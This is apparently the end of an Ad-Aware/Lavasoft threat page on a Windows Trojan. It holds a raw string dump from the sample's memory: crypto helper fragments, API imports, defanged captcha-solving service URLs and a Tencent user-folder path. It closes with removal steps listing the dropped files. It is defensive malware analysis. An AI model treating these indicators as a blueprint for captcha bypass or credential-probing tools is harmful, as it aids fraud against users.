cx.lastIndex = 0;
if (cx.test(text)) {
text = text.replace(cx, function (a) {
('0000'   a.charCodeAt(0).toString(16)).slice(-4);
.test(text.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g, '@')
.replace(/"[^"\\\n\r]*"|true|false|null|-?\d (?:\.\d*)?(?:[eE][ \-]?\d )?/g, ']')
.replace(/(?:^|:|,)(?:\s*\[) /g, ''))) {
throw new SyntaxError('JSON.parse');
JSON.stringify(Lobj['
Lobj.push("
Lobj.push(
Lobj.push('
Lobj.length
JSON.stringify(Lobj[
Lobj.splice(
JSON.stringify(Lobj
GetAllKey
function encrypt(str,pass){
data = m_xxtea.encrypt(str, pass);
function decrypt(str,pass){
data = m_xxtea.decrypt(str, pass);
if (str.match(/^[\x00-\x7f]*$/) != null) {
return str.toString();
len = str.length;
c = str.charCodeAt(i);
out[j] = str.charAt(i);
out[j] = String.fromCharCode(0xc0 | (c >>> 6),
out[j] = String.fromCharCode(0xe0 | (c >>> 12),
c2 = str.charCodeAt(i);
out[j] = String.fromCharCode(0xf0 | ((c >>> 18) & 0x3f),
return out.join('');
if ((str.match(/^[\x00-\x7f]*$/) != null) ||
(str.match(/^[\x00-\xff]*$/) == null)) {
c = str.charCodeAt(i  );
out[j  ] = str.charAt(i - 1);
c2 = str.charCodeAt(i  );
out[j  ] = String.fromCharCode(((c & 0x1f) << 6) |
c3 = str.charCodeAt(i  );
out[j  ] = String.fromCharCode(((c & 0x0f) << 12) |
c4 = str.charCodeAt(i  );
out[j  ] = String.fromCharCode(((s >>> 10) & 0x03ff) | 0xd800,
var base64EncodeChars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /'.split('');
len = str.length;
c = str.charCodeAt(i  ) << 16 |
str.charCodeAt(i  ) << 8 |
str.charCodeAt(i  );
c = str.charCodeAt(i  );
c = str.charCodeAt(i  ) << 8 |
return out.join('');
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63,
if (/[^ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789\ \/\=]/.test(str)) {
if (str.charAt(len - 2) == '=') {
else if (str.charAt(len - 1) == '=') {
c1 = base64DecodeChars[str.charCodeAt(i  )];
c2 = base64DecodeChars[str.charCodeAt(i  )];
out[j  ] = String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));
c3 = base64DecodeChars[str.charCodeAt(i  )];
out[j  ] = String.fromCharCode(((c2 & 0x0f) << 4) | ((c3 & 0x3c) >> 2));
c4 = base64DecodeChars[str.charCodeAt(i  )];
out[j  ] = String.fromCharCode(((c3 & 0x03) << 6) | c4);
var length = data.length;
data[i] = String.fromCharCode(
return data.join('').substring(0, n);
return data.join('');
var length = string.length;
result[i >> 2] = string.charCodeAt(i) |
string.charCodeAt(i   1) << 8 |
string.charCodeAt(i   2) << 16 |
string.charCodeAt(i   3) << 24;
result[result.length] = length;
this.encrypt = function(string, key) {
var k = stringToLongArray(key, false);
if (k.length < 4) {
k.length = 4;
var n = v.length - 1;
var mx, e, p, q = Math.floor(6   52 / (n   1)), sum = 0;
this.decrypt = function(string, key) {
var mx, e, p, q = Math.floor(6   52 / (n   1)), sum = q * delta & 0xffffffff;
* See hXXp://pajhome.org.uk/crypt/md5 for details.
function hex_sha1(s){return binb2hex(core_sha1(str2binb(s),s.length * chrsz));}
function b64_sha1(s){return binb2b64(core_sha1(str2binb(s),s.length * chrsz));}
function str_sha1(s){return binb2str(core_sha1(str2binb(s),s.length * chrsz));}
function hex_hmac_sha1(key, data){ return binb2hex(core_hmac_sha1(key, data));}
function b64_hmac_sha1(key, data){ return binb2b64(core_hmac_sha1(key, data));}
function str_hmac_sha1(key, data){ return binb2str(core_hmac_sha1(key, data));}
for(var i = 0; i < x.length; i  = 16)
* Calculate the HMAC-SHA1 of a key and some data
function core_hmac_sha1(key, data)
var bkey = str2binb(key);
if(bkey.length > 16) bkey = core_sha1(bkey, key.length * chrsz);
ipad[i] = bkey[i] ^ 0x36363636;
opad[i] = bkey[i] ^ 0x5C5C5C5C;
var hash = core_sha1(ipad.concat(str2binb(data)), 512   data.length * chrsz);
return core_sha1(opad.concat(hash), 512   160);
* Add integers, wrapping at 2^32. This uses 16-bit operations internally
for(var i = 0; i < str.length * chrsz; i  = chrsz)
bin[i>>5] |= (str.charCodeAt(i / chrsz) & mask) << (32 - chrsz - i2);
for(var i = 0; i < bin.length * 32; i  = chrsz)
str  = String.fromCharCode((bin[i>>5] >>> (32 - chrsz - i2)) & mask);
for(var i = 0; i < binarray.length * 4; i  )
str  = hex_tab.charAt((binarray[i>>2] >> ((3 - i%4)*8 4)) & 0xF)  
hex_tab.charAt((binarray[i>>2] >> ((3 - i%4)*8 )) & 0xF);
for(var i = 0; i < binarray.length * 4; i  = 3)
if(i * 8   j * 6 > binarray.length * 32) str  = b64pad;
else str  = tab.charAt((triplet >> 6*(3-j)) & 0x3F);
__MSVCRT_HEAP_SELECT
qqcrypt.dll
/-UM2.SD60O:<2J1A4E)G6@"P:6
6.LX:0GN?2CEE4>=L785T:1/Z=,*a?'%d@%#fB#!hB!
dA@(
(2015.05.14)
(2015.05.12)
(2015.05.11)
(2015.05.02)
(2015.04.28)
(2015.04.21)
(2015.04.15)
(2015.04.02)
(2015.04.01)
(2015.03.30)
(2015.03.27)
(2015.03.26)
(2015.03.25)
(2015.03.23)
(2015.03.18)
(2015.03.14)
(2015.03.13)
(2015.03.07)
(2015.03.06)
(2015.03.05)
(2015.03.01)
(2015.02.09)
(2015.01.31)
(2015.01.30)
(2015.01.29)
(2015.01.28)
(2015.01.22)
(2015.01.19)
(2015.01.18)
(2015.01.13)
(2015.01.12)
(2015.01.11)
(2015.01.10)
(2015.01.08)
(2014.12.24)
(2014.12.23)
(2014.12.21)
(2014.12.01)
(2014.11.30)
(2014.11.25)
(2014.11.22)
(2014.11.20)
(2014.11.14)
(2014.11.13)
(2014.11.12)
(2014.11.11)
tn|px.lD
.comment {color:green}
*.txt
|*.txt
%d&&'
123456789
00003333
1.2.18
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
MSWHEEL_ROLLMSG
Broken pipe
Inappropriate I/O control operation
Operation not permitted
AVIFIL32.dll
WinExec
GetWindowsDirectoryA
GetKeyState
SetWindowsHookExA
UnhookWindowsHookEx
CreateDialogIndirectParamA
GetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
WINMM.dll
WINSPOOL.DRV
comdlg32.dll
.PAVCNotSupportedException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
icmp.dll
windows
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
libpng error: %s
libpng warning: %s
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
<tr><td bgcolor=buttonface>Y</td><td bgcolor=white>%d</td></tr>
<tr><td bgcolor=buttonface>X</td><td bgcolor=white>%d</td></tr>
<tr><td bgcolor=buttonface>Height</td><td bgcolor=white>%d</td></tr>
<tr><td bgcolor=buttonface>Width</td><td bgcolor=white>%d</td></tr>
<tr><td bgcolor=buttonface>RECT</td><td bgcolor=white>(%d, %d)-(%d, %d)</td></tr>
<tr><td bgcolor=buttonface>Styles</td><td bgcolor=white>0xX</td></tr>
<tr><td bgcolor=buttonface>Control ID</td><td bgcolor=white>%d</td></tr>
<tr><td bgcolor=buttonface>Handle</td><td bgcolor=white>0xX</td></tr>
<table><tr><td><icon handle=0x%X></td><td>%s</td></tr></table>
burlywood
\winhlp32.exe
:%d) |
%I64d%s
:0{}%s
:%d)%s
(*.avi)|*.avi
WPFT532.CNV
WPFT632.CNV
EXCEL32.CNV
write32.wpc
Windows Write
mswrd632.wpc
Word for Windows 6.0
wword5.cnv
Word for Windows 5.0
mswrd832.cnv
mswrd632.cnv
Word 6.0/95 for Windows & Macintosh
html32.cnv
;3 #>6.&
'2, / 0&7!4-)1#
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
msvfw32.dll
avifil32.dll
winmm.dll
msimg32.dll
winspool.drv
ws2_32.dll
9.5.25.212
1, 0, 6, 6
- Skin.dll
2014, 2, 7, 1
FastVerCode.DLL
CCaptchaRecognizer::recognizeByCodeTypeAndUrl
hXXp://s1.uudati.com:
hXXp://s1.taskok.com:
hXXp://s1.uudama.com:
hXXp://s1.uuwise.com:
/Api/config.aspx
2.0.0.5
WiseClientAPI-2.0.0.5
CCaptchaRecognizer::__UpdateTKEY
CCaptchaRecognizer::_IsNeedLogin
/Api/DecodeImg.aspx
xxxxxxxxxxx
hXXp://p1.uuwise.net:
hXXp://p1.uudama.net:
hXXp://p1.taskok.com:
hXXp://p1.uuwise.com:
hXXp://p1.uudama.com:
CCaptchaRecognizer::easyRecognizeUrl
%d%d%d%d%d
CCaptchaRecognizer::_CalcRandomPort
/Api/VerifyAPIFile.aspx
/Api/UserLogin.aspx
CCaptchaRecognizer::login
/Api/UserReg.aspx
/Api/PayCard.aspx
/Api/ReportError.aspx
CCaptchaRecognizer::reportError
/Api/UserPoint.aspx
|2.0.0.5|
/Api/DecodeResult.aspx
ID/KEY/
ByTypeBytes.JPG
%d-%d-%d
CHttpRequestHelper::_ReadResponse
User-Agent:WiseClient-2.0.0.5;
WiseClient-2.0.0.5
CHttpRequestHelper::_InternalRequest
CHttpRequestHelper::RequestGetImage
CHttpRequestHelper::RequestPost
ServerPort
UUExtConfig.ini
-:-:-.%d
tCRYPTDLL.DLL
3.cn.pool.ntp.org
2.cn.pool.ntp.org
1.cn.pool.ntp.org
0.cn.pool.ntp.org
cn.pool.ntp.org
\\.\PHYSICALDRIVE0
Microsoft Windows Millennium Edition
Microsoft Windows 98
Microsoft Windows 95
%s (Build %d)
Service Pack 6a (Build %d)
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
Web Edition
Service Pack %d (Build %d)
Microsoft Windows NT
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Server 2003,
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 "R2"
Windows Server 2008
Windows Vista
Windows Server 2008 R2
Windows 7
ox-x-x-x-x-x
\Tencent\Users\*.*
nKERNEL32.DLL
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
!"#$%&'()* ,-.
uuwise.com
2, 0, 0, 5
1.0.0.1
!"#$%&'()* ,-
25, 0, 0, 1
Windows
%s %s %d
d:d:d
%s, %d %s
d:d:d UTC
%%X
error %d
dd
JSSig.tlb
ConstDeb.tlb
Date.toUTCString
Date.toGMTString
JSON.parse
JSON.stringify
Error.toString
Enumerator.atEnd
Enumerator.moveFirst
Enumerator.moveNext
Enumerator.item
VBArray.valueOf
VBArray.toArray
VBArray.getItem
VBArray.dimensions
VBArray.ubound
VBArray.lbound
Date.toJSON
Date.valueOf
Date.toLocaleTimeString
Date.toLocaleDateString
Date.toDateString
Date.toTimeString
Date.toString
Date.toLocaleString
Date.setUTCMilliseconds
Date.setUTCSeconds
Date.setUTCMinutes
Date.setUTCHours
Date.setUTCDate
Date.setUTCMonth
Date.setUTCFullYear
Date.setMilliseconds
Date.setSeconds
Date.setMinutes
Date.setHours
Date.setDate
Date.setMonth
Date.setFullYear
Date.setYear
Date.setTime
Date.getUTCMilliseconds
Date.getUTCSeconds
Date.getUTCMinutes
Date.getUTCHours
Date.getUTCDay
Date.getUTCDate
Date.getUTCMonth
Date.getUTCFullYear
Date.getMilliseconds
Date.getSeconds
Date.getMinutes
Date.getHours
Date.getDay
Date.getDate
Date.getMonth
Date.getFullYear
Date.getYear
Date.getTimezoneOffset
Date.getVarDate
Date.getTime
Date.UTC
Date.parse
Boolean.valueOf
Boolean.toString
Number.valueOf
Number.toPrecision
Number.toExponential
Number.toFixed
Number.toLocaleString
Number.toString
Object.toLocaleString
Object.propertyIsEnumerable
Object.hasOwnProperty
Object.isPrototypeOf
Object.valueOf
Object.toString
Object.getOwnPropertyDescriptor
Object.defineProperty
Array.toLocaleString
Array.splice
Array.unshift
Array.shift
Array.pop
Array.push
Array.toString
Array.sort
Array.slice
Array.reverse
Array.join
Array.concat
RegExp.toString
RegExp.test
RegExp.exec
RegExp.compile
String.localeCompare
String.toLocaleUpperCase
String.toLocaleLowerCase
String.valueOf
String.toUpperCase
String.toString
String.toLowerCase
String.sup
String.substr
String.substring
String.sub
String.strike
String.split
String.small
String.slice
String.search
String.replace
String.match
String.link
String.lastIndexOf
String.italics
String.indexOf
String.fontsize
String.fontcolor
String.fixed
String.concat
String.charCodeAt
String.charAt
String.bold
String.blink
String.big
String.anchor
String.fromCharCode
Function.call
Function.apply
Function.toString
Math.tan
Math.sqrt
Math.sin
Math.round
Math.random
Math.pow
Math.min
Math.max
Math.log
Math.floor
Math.exp
Math.cos
Math.ceil
Math.atan2
Math.atan
Math.asin
Math.acos
Math.abs
Debug.writeln
Debug.write
stdole2.tlb
stdole32.tlb
stdole.tlb
jscript.dll
JSDeb.tlb
pdm.dll
{00000000-0000-0000-0000-000000000000}
\\?\Volume
CLSID\%s\InProcServer32
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
join
export
import
5.8.7601.17141
!Can't perform requested operation
.Object variable or With block variable not set
Ên't create necessary temporary file
%Automation server can't create object Class doesn't support Automation
=File name or class name not found during Automation operation
.Object doesn't support this property or method
"Object doesn't support this action&Object doesn't support named arguments-Object doesn't support current locale setting
9Variable uses an Automation type not supported in JScript
Boolean expected&Can't execute code from a freed script
The precision is out of range"Array or arguments object expected.Array length must be a finite positive integer6Array length must be assigned a finite positive number
Array object expected7'eval' is not available in the ECMA 327 Compact ProfileEFunction constructor is not available in the ECMA 327 Compact Profile2Circular reference in value argument not supported
-Object doesn't support property or method '|'
&'return' statement outside of function"Can't have 'break' outside of loopÊn't have 'continue' outside of loop
Expected '@end'%Conditional compilation is turned off
(*.*)

%original file name%.exe_312_rwx_009E9000_00002000:

kernel32.dll
user32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
msvfw32.dll
avifil32.dll
gdi32.dll
winmm.dll
msimg32.dll
winspool.drv
comdlg32.dll
advapi32.dll
shell32.dll
ole32.dll
oleaut32.dll
comctl32.dll
ws2_32.dll
RegCreateKeyExA

%original file name%.exe_312_rwx_01118000_0000C000:

x.yvr
x.yvkd
x.yvw
x.yvq5v

%original file name%.exe_312_rwx_011AD000_000CA000:

version.dll
user32.dll
shell32.dll
1e.ro4A
oleaut32.dll
H0.gW
comctl32.dll
advapi32.dll
gdi32.dll
d.jF/"
r#'%C
6.Xdp
g|$^.Cn
>.bM8
>Z.Ye
w4R`$p%s*
f.zo~L^
wsock32.dll
ntdll.dll
Ë.L@
l.sQ{
c-t{.FF
b#I".wM
e.ENZ
xip.tu
@>.vO
%FX2Fsi
qKT.jLka
3.LD7
Uq
G,.gd
<.cFF=j
&8.XMj
$~O.Ba
)].Wd
/_{M%U
Q%s6|
lVfeVg
 !%uO
mh.ud
m%Csn%
kq84.QaI
)f%fg
.SuDYw
K)`p.frC
*%s!%
aR.dDb&<y
.xk 4g
ShellExecuteA
RegCloseKey
)%S{.
'U}.Ue
l%S(8x$!(
1L%UJ
.vtbw
.iA5N
yyhKa%S
d.Zd=#R
x0r%F{
.IPi)
Vj.jH
>M%X9
/8[<{~@ 
bc.lTk
ks_GetMsg
kssPlugin.dll
tole32.dll
kernel32.dll

%original file name%.exe_312_rwx_10000000_0003F000:

`.rsrc
L$(h%f
SSh0j
msctls_hotkey32
TVCLHotKey
THotKey
\skinh.she
}uo,x6l5k%x-l h
9p%s m)t4`#b
e"m?c&y1`Ð<
SetViewportOrgEx
SetViewportExtEx
SetWindowsHookExA
UnhookWindowsHookEx
EnumThreadWindows
EnumChildWindows
`c%US.4/
!#$<#$#=
.text
`.rdata
@.data
.rsrc
@.UPX0
`.UPX1
`.reloc
hJK.ZH
O.qt0
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
SkinH_EL.dll
1, 0, 6, 6
- Skin.dll


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\sqlite3.dll (1825 bytes)
    C:\qyd1.edb (260 bytes)
    C:\qyd.db-journal (1594 bytes)
    C:\qyd2.enx (1 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now